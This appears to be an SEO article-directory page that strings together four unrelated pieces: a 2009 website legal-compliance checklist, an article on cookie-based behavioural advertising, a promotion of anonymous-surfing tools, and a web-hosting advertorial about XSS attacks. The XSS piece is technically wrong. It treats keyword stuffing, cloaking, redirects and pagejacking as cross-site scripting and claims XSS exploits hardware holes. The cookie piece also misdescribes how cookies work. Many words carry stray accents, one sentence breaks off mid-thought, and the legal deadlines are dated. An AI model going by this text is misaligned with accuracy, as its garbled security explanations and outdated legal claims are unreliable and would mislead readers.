SEO Review

It’s early in the year, and it’s time to fulfill your resolution to give your site a quick legal check-up.

Online businesses are now highly regulated, and there’s substantial liability if your site’s not legally compliant. In addition, your customers are becoming more Internet savvy, and a site that’s not legally compliant is not going to be trusted.

So, let’s get started.

Use This Checklist If You Already Have The Basic Site Documents In Place

1. Copyright Notice. Check Your Copyright Notice. Your copyright notice consists of the following elements: the word "copyright" or copyright symbol (c in a circle) followed by the year of first publication followed by the name of the copyright owner. It’s also a good idea to add "All rights reserved worldwide". Example: Copyright 1996-09 Digital Contracts, Inc. All rights reserved worldwide. Note that if you update your site from time to time, you should add a date range reflecting the fact that the site has been updated each year within the date range. If you haven’t updated yet for 2009, do it now.

2. Blogs, etc. Have you recently added a blog or any other functionality that permits visitors to post text or digital files to your site? Or, do you plan to do so as part of your marketing plans for 2009? If so, you need to have a DMCA notice in your Terms of Use and you also need to file a DMCA Registration form with the U.S. Copyright Office. These steps will create a "safe harbor" from strict liability for copyright infringement if a site visitor posts infringing material to your site.

3. Personal Information. Do you collect personal information from site visitors? If so, review your Privacy Policy to make sure that you identify all of the categories of personal information you collect and the way in which you share this personal information. If you’ve changed these policies since you posted your Privacy Policy, amend it now… without delay.

4. Data Security. Check your data security measures. If you collect personal information, you are required to implement "reasonable and appropriate" data security measures. These measures are essentially moving targets since data security technology evolves at a relatively rapid pace. What may have been "reasonable and appropriate" a couple of years ago may not pass muster today. Update your security procedures, if necessary.

5. Future Sale of Your Business? If your online business is starting to be successful and generate positive revenue, have you ever considered that you might want to sell it for a profit in the future? If so, be sure that your Privacy Policy specifies that personal information collected may be transferred and shared in the event of a sale. If you don’t do this prior to collecting personal information, you won’t be able to pass it on to your purchaser. The Federal Trade Commission (FTC) stipulated in recent settlements that personal information collected prior to posting this notice in your Privacy Policy will not be transferable in the event of a sale. And this personal information (your opt-in lists and customer lists) are the real value of your online business.

6. Service Providers. Do you use service providers to provide hosting, site maintenance, SEO services, or other site functions where they have access to your server? If you don’t collect personal information, your answer to this question is immaterial, but if you do (and only an email address will suffice), you need to enter into privacy and security agreements with your service providers. The FTC stipulated in a couple of recent settlements that you would be liable if you don’t.

7. Registration Agreement. Does your site require site visitors to register for certain benefits such as a membership or subscription rights? If so, you need an electronic agreement (a so-called "click-wrapped" agreement where the user clicks on "I ACCEPT"). Your agreement should be presented conspicuously in the registration process and it should require an affirmative act (clicking on "I ACCEPT") to complete the registration. You also need to be sure that all of your warranty disclaimers and limitations of liability pass muster.

8. Collect Birth Dates? Do you collect the date of birth as part of your registration process? If so, and if this date indicates that children under 13 are registering, you will be liable for substantial damages under the Children’s Online Privacy Protection Act (COPPA) if you do not comply with COPPA’s stringent requirements. You should either modify your information collection practices or comply with COPPA, or both.

9. Creditor Under FACTA? Do your registered users make periodic payments payable as monthly or quarterly installments, or do you extend credít so that payment is made after receipt of the product or service? If so, you fall within the statutory requirements of the Fair and Accurate Credít Transactions Act of 2003 (FACTA). FACTA requires that you adopt a "Red Flag" Identity Theft Policy before May 1, 2009, or face substantial liability.

10. Sales Intermediaries? Do you use affiliates or resellers? If so, a recent New York case illustrates that you may be liable for their actions if they violate certain laws acting on your behalf. For example, are your affiliates engaged in illegal spamming activities? If they are offering their own end user license agreements, do they properly disclose certain activities such as the use of pop up ads? You should check your affiliate and reseller agreements and modify them, if required.

Use This Checklist If You Don’t Have Your Site Documents In Place

You may be just starting your online business, or you may have procrastinated a little with your website legal compliance. If you fall into this group, you should get started without delay.

I’ve developed a procedure that will help you determine the correct mix of legal compliance documents for your site. Part of it is set out below.

First, if your site does not collect personal information, you should consider these documents:

• a Legal page for your intellectual property notices; and
• Terms of Use.
• And if you allow site visitors to post text or digital files to your site (for example via a blog, forum, or chat room), you’ll need a DMCA Registration Form (see No. 2 above).

Second, if your site collects personal information, but does not require registration to open an account or to use or purchase a product or service, you should consider these additional documents:

• Privacy Policy.
• And if you have service providers that have possession of your server or have access rights to it, you’ll need a privacy-security agreement for these service providers (see No. 6 above).

Third, if your site requires registration to open an account or to use or purchase a product or service, you should consider in addition to the foregoing documents, a customer agreement such as:

• a software as a service (SaaS) agreement; and/or
• a Software License Agreement (for software downloads).
• And if you are regulated by FACTA (see No. 9 above), you’ll need a Red Flag Identity Theft Policy — before the May 1, 2009 deadline.

Conclusion

The checklists provided above are not exhaustive. However, they should point you in the right direction as you give your site a new year’s legal compliance check-up.

A simple check-up — and remedial action if necessary — is one of the best investments you can make in your online business.

About The Author
Chip Cooper is a leading intellectual property, software, and Internet attorney who’s advised software and online businesses nationwide for 25+ years.

Have you ever been surfing the web and come upon Internet advertising that provides a direct solution for something that you’ve been researching lately? Did you think that it might be related to your computer cookies, or did you chalk it up to serendipity?

The fact is, it almost certainly wasn’t a coincidence. Behavior-based Internet advertising is a relatively new and very powerful way for advertisers to get their message in front of potential buyers that they know to be qualified. The question is, how do they know that the surfer is qualified?

The advertisers know this because the Internet advertising network is tracking the surfers’ online activity. With tracking, advertisers know what sites you like. They know what searches you make. They have profiled you, and, unlike in real life, profiling on the web is AOK — so far.

Check Your Computer for Cookies

Before we get into the legal issues involved, perhaps a further definition of the technology is in order. Most (but not all) behavioral Internet advertising is based on computer "cookies." These computer cookies are tiny files that are placed on your machine when you visit certain websites. In the simplest form, you go to a web page. An advertiser has a blank spot, or placeholder, for a banner ad. But instead of serving up just any banner ad, the advertiser parses through your computer for cookies to discover your likes and dislikes, and then you are fed Internet advertising based on your online behavior.

For some people, this is no big deal. They like Internet advertising to be targeted toward them, and they don’t mind computer cookies. For others, it’s a little Orwellian and creepy. This leads us to the great debate.

Opt-in or Opt-out?

One big question to be resolved is whether ultimately this type of Internet advertising will be "opt-in" (meaning that a user has to sign up in order to receive targeted ads) or "opt-out" (meaning that a user will receive targeted ads unless they specifically ask not to).

It shouldn’t surprise anyone to know which side the advertisers are on. If governmental regulators eventually require that all Internet advertising be "opt-in", the industry will be severely restricted. My guess is that it would relegate behavior-based Internet advertising to a fringe player in the online marketing world.

The privacy advocates, naturally, are on the other side of the fence. The vast majority of people assume that their online activity is not being tracked, they say. Why should they have to take a specific action in order to remove computer cookies and to not be tracked and profiled?

A Do Not Track List?

Recently, a group of nine consumer advocate groups proposed the idea of a "Do Not Track" list for Internet advertising, which would work in a similar fashion as the "Do Not Call" list works today. Naturally, this is an "Opt-out" scenario, but because of the attention that the formation of such a list would bring, it may be a suitable compromise between advertiser and advocate.

How to Prevent Being Tracked

It is fairly easy to prevent being tracked by advertisers. You simply prevent your machine from accepting computer cookies. Go to START, SETTINGS, CONTROL PANEL and click on INTERNET OPTIONS then the PRIVACY tab. (Note that these instructions assume you are working with a Windows XP system. The procedure will be similar, however, for other operating systems.) Slide the bar all the way to the top to where it says "Block All Cookies."

However, you should be aware that this change may limit your Internet experience. Some websites will not display properly (or at all) if you do not accept computer cookies. In my experience, at least one of the top five search engines will not work at all. Other engines have limited functionality when you block Internet advertising.

Even if you do manage to turn off your computer cookies, don’t rest easy just yet.

The Newest Technology

Recently, it was announced that a Silicon Valley startup named NebuAd has created a new technology that does not require computer cookies. Under the NebuAd model, the company teams up directly with service providers and installs equipment directly at their facilities that allows them to track the behavior of individuals on the web, even if their machine does not accept computer cookies. This, of course, requires Internet Service Providers (ISPs) to embrace the new technology; naturally, they are given a piece of the Internet advertising revenue that is generated. Whether or not any of the major players embrace this technology will probably depend largely on public outcry, or lack thereof. Of course, if this does become the newest behavioral targeting standard, we will return again to the question of "Opt-in" or "Opt-out."

Conclusion

The future of this approach to Internet advertising is unclear, and will depend largely on public education and reaction. Will people see value in receiving targeted ads, even if it means that somewhere there is an "anonymous" profile of them sitting on a server? Will they feel outraged and push for a total ban? It’s hard to say.

Will this new approach be the death of the Internet as we know it? Probably not. But it should at least be interesting.

About The Author
Scott Buresh is the CEO of Medium Blue, which was recently named the number one search engine optimization company in the world by PromotionWorld. Scott has contributed content to many publications including Building Your Business with Google For Dummies (Wiley, 2004), MarketingProfs, ZDNet, WebProNews, DarwinMag, SiteProNews, ISEDB.com, and Search Engine Guide. Medium Blue serves local and national clients, including Boston Scientific, DS Waters, and Wake Forest University Baptist Medical Center. Visit MediumBlue.com to request a custom SEO guarantee based on your goals and your data.

So, let’s talk privacy, and then let’s talk about how you haven’t got any. That’s right, if you are surfing the Internet, and you aren’t doing it through some third party proxy server, the sites you surf to can potentially learn everything about you-your habits, your likes and dislikes, your buying preferences and more.

In this way, advertisers can serve up those annoying pop-up ads, spyware can quietly download to your computer in the background and track your every move, government agencies can watch you, and hackers can slither into your hard drive and steal your world.

Paranoid yet?

If you aren’t, re-read the the opening to this article slowly. While you are reading it, remember an advertiser’s spyware could be phoning in your private information for future use as you read.

What is anonymous surfing? Remember the old punchline, “On the Internet, nobody knows you’re a dog?” Well, if you practice Anonymous Web Surfing 101, nobody will know whether you’re Fido, the family pet out looking for the latest craze in dog food or the parakeet looking for warmer climes.

But seriously folks, put simply, anonymous web surfing erases any trace or trail of where you’ve been or going on the Internet.

Your private world remains private and no one, not even your Internet Service Provider (that’s the guy you pay $20 to $40 dollars a month to get on the Net) won’t have a clue about who you are. This is how it used to be, and this is how it should be. Period. End of story.

Beyond simple paranoia, people have various reasons to surf anonymously ranging from general terror about losing their privacy to wanting to keep their personal surfing sites that they go to on the job away from the prying eyes of their employers.

Beyond the obvious, what are spy websites looking for, and how do they accomplish it. Websites use a variety of methods to gather intel from the most basic which is your IP address to placing cookies on your website.

Your IP address is where you started from, like your home street address. Cookies are little bits of information placed on your computer that keeps track of your habits.

One of the easiest cookies is kept by Internet Explorer, when you visit and log in to a website, IE will ask you if you want it to remember your username and password. If you say yes, it will download a small file with that information to your hard drive. Forever more, or until you clear your cookies in IE, whenever you visit that site, it will automatically fill in your log in information.

Neat, huh? Well that’s okay. But what about the cookies that are downloaded that you don’t know about. That’s where the grey area of invasion of privacy comes in. That’s also where anonymous web surfing stops it dead in its tracks.

Sites use a variety of techniques to gather and collate this information, but the two most basic are examining your IP address and placing cookies on your PC. Matching your IP address with your cookies makes it easier for them to create personal profiles. If you’d like to see what kind of information sites can gather about you, head to these two sites, which peer into your browser and report what they find.

Analyze.Privacy.net gives a comprehensive report plus an introduction to privacy.net which shows you more about cookies, gives you a look at what others see when they look at your computer and more.

Browse Spy goes even deeper into your system and gives an eye-opening report on what’s on your system right down to the software you own.

Now that you know why you should surf anonymously and how easy it is for others to violate your privacy, how do you stop it? It’s actually easier than you might think.

There are a couple software packages out there for anonymous surfing. I personally like Tor and Vidalia. It runs in the background through my Firefox settings, and while it slows down my surfing a little, The Tor/Vidalia combination is a bit tricky to set up so if you don’t need heavy-duty protection, you might want to select one of the packages listed below. Either way, I no longer have to wonder who’s virtually following me around taking notes.

Like most anonymizers, it sends my information through a special series of computers called proxy servers which screen me from the websites I’m contacting.

My computer contacts a proxy server instead of the website directly. The website, in turn, doesn’t see me, it sees the proxy server’s IP address and proxy servers are like the aircraft carriers of the net.

They have so much armament to block cookies, popups and other web parasites that they don’t get infected or pass anything on to their clients.

Other programs that facilitate anonymous surfing include Guardster, SnoopBlocker, Mega Proxy and Anonymizer. My second favorite, anonymizer, is one of the four I just listed. Anonymizer is recognized as the leader of the pack and is relatively simple to use.

It’s where I started before I got involved with servers and such, and is really good for web surfing protection.

Last, if you are at work and can’t load a bunch of stuff to your workstation, simply surf to http://www.the-cloak.com/anonymous-surfing-home.html. It’s web based, easy and with nothing to download, a real godsend. Give them a donation and you can log in and surf to your heart’s content.

It’s not the prettiest site to look at, but it is functional and it hasn’t yet failed me for fast cloaking.

It’s done by having a special computer — called a proxy server — screening you from the websites you are contacting. Your computer contacts only the proxy server, which contacts the website for you.

The website, in turn, sees only your proxy server and not you. In addition to hiding your IP address, a proxy server will usually block cookies, pop-ups and other annoying web parasites.

With some systems you have to go to an anonymous service website and access your favorite website from there. With others, you download and install software which finds an anonymous server for you.

There are numerous services and programs that facilitate anonymous surfing such as Guardster, SnoopBlocker and Mega Proxy, but Anonymizer is the pioneer and recognized leader of the pack.

About The Author

Alojate.com is the premier web hosting company in Mexico, offering a range of services for all business needs.

The world wide web is a dynamic, exciting place to launch a new business or promote your organization’s message. It’s also a lawless landscape in which black hats – crackers, hackers and other on-line evil doers – roam with very little oversight or law enforcement.

And that means it’s up to every site owner to ensure that his or her site is defended against intrusions, code injections and other forms of attack. There’s plenty of software to help keep hackers out of your desktop pc, but what about your hostíng service? How can you protect server-based data?

Top-tier web hostíng firms design proprietary hardware and software protection to ensure that your business is secure. But site security doesn’t stop with impenetrable firewalls, sp@m zappers and e-mail scanners. In fact, if you go with a hostíng service that isn’t up to speed on the latest forms of hacker attackers, you could quickly find your site is no longer under your control!

Great hosts “harden” their server systems to deter and deflect known exploit points in the software the servers run and in any client-site’s code! There is where the value of quality hostíng comes into play .

XSS Attacks

XSS stands for cross site scripting and it poses a threat to even the most secure sites because XSS exploits vulnerable hardware and software holes that allow black hat SEOs to circumvent commonly employed security systems. In an XSS attack, black hats inject malicious HTML scrípt into site pages of other domains. They do this for two reasons.

First, in some instances, black hats inject undetected scripting into competitor sites to taint these sites when SE bots spider them. Imagine, a competitor is able to access your site’s code, insert invisible text (at least invisible to you) and, when an SE bot discovers this invisible text, your site is slammed. Even banned from Google. Don’t think it can happen? It closes down on-line businesses daily.

So what kind of attacks can be “planted” on your site? There are plenty:

Redirects take visitors to another site as soon as they reach yours.

Overloading alt tags, meta tags and other interior coding with keywords, sometimes called keyword stuffing.

Inaccurate or misleading keywords inserted within site pages.

Cloaking, which detects search engine spiders and changes site text to improve PR.

Pagejacking, the practice of stealing site content, can not only cost you in salës, it can also slam your PR because your content isn’t “original” any longer.
Any of these black hat SEO tactics and more (spamglish, links farms, virus injections, etc.) can and will do severe, if not irreparable, damage to your on-line enterprise. Why?

SE Bots Are Brainless

SE spiders are dumber than a box of rocks. They’re unable to discern legitímate text from a malware injection. They rely, solely, on automation to assess and categorize a site. There’s no subjective analysis. Just text strings that are sorted completely by brainless bots.

A competitor, using one of the XSS attacks listed above, exploits to “de-optimize” and make it appear that you’re using black hat SEO tactics, or can gain access to your site through a web browser and/or inject toxic data to devalue your content.

Google Penalties For Black Hat Tactics

The purpose of any search engine is to deliver relevant, useful SERPs to users’ queries. So, when a Google bot discovers what it perceives as an attempt to falsely increase value, the site may suffer serious, site-threatening sanctions.

Some of these penalties may be imposed without you even knowing about it – until you discover that site revenues have dropped 75% in two days as a result of lost rankings and traffíc! A site discovered to employ black hat SEO may be penalized in page rank, may löse PR altogether, may experience SE indexing issues (partial or mis-indexing, for example) and, for the worst offenders, banishment from the Google site altogether. Dead in the eyes of Google bots.

So, here’s the problem: without your knowledge, a black hat competitor can inject toxic scrípt into your site that could, conceivably, get your site banned from Google. Even if you and your web host have all the firewall and intrusion detection protection there is.

It Gets Even Worse

The second reason black hats use cross site scripting is to actually gain access and control of your on-line business. Certain types of XSS attacks actually enable a complete stranger to acquire the same system privileges reserved for the site owner – you.

Access to sensitive customer data, bank account information, the entire back office – all can be achieved with relative ease by a knowledgeable cracker looking to steal and plunder your site.

Whether the black hat is a competitor who wants to eliminate the competition, or a script-kiddie looking to clean out the till and sell some credít card numbers, your on-line business is at risk regardless of how much security you and your web host deploy.

This Is Where Quality Web Hostíng Enters

During the design, administration and growth of a web-based business, numerous tools and applications are used by site owners and designers. There’s site building software, email management software, a check-out, customer database, automated shipping apps, tools for developing site metrics and many others.

This software isn’t necessarily designed with security as Priority One. Often, there are openings in commonly-used ebiz software that are exploited by black hats during the execution of an XSS attack.

And, because of the nature of these attacks, system and server security measures can be breached because, in essence, the hackers piggyback their way onto an unsuspecting site using the site administrators’ credentials to gain access and/or control.

The key to protection from XSS attacks is in the proper configuration of all of the applications and tools that comprise your on-line enterprise. These apps must be synced up to work together while, at the same time, developing protection against XSS attacks.

This configuring of applications is done at the host level and should include a detailed analysis of potential XSS entry points within the site’s design and reconfiguration to fit the server security already in place.

Go With The Host Who Knows

If your web hostíng service isn’t familiar with the growing danger of XSS attacks based on application exploitation points, consider finding a more informed host.

It’s not a matter of securing your business system locally. And it’s not a matter of the multi-layers of protection offered by your web host.

It’s a matter of thinking like a black hat and taking a proactive stance against XSS attacks they may employ. If you aren’t sure your site is protected, and your hostíng rep can’t provide the assurances you require, talk to another hostíng company before disaster strikes and your site is banned from Google.

It’s that important.

About The Author
Frederick Townes is the owner of W3 Hostíng, a web hostíng company dedicated to providing fast servers, guaranteed uptime and reliable, friendly support. When your site is an important part of your business you need a professional web hostíng company to keep it online and running smoothly. W3 Hostíng is just that – and more.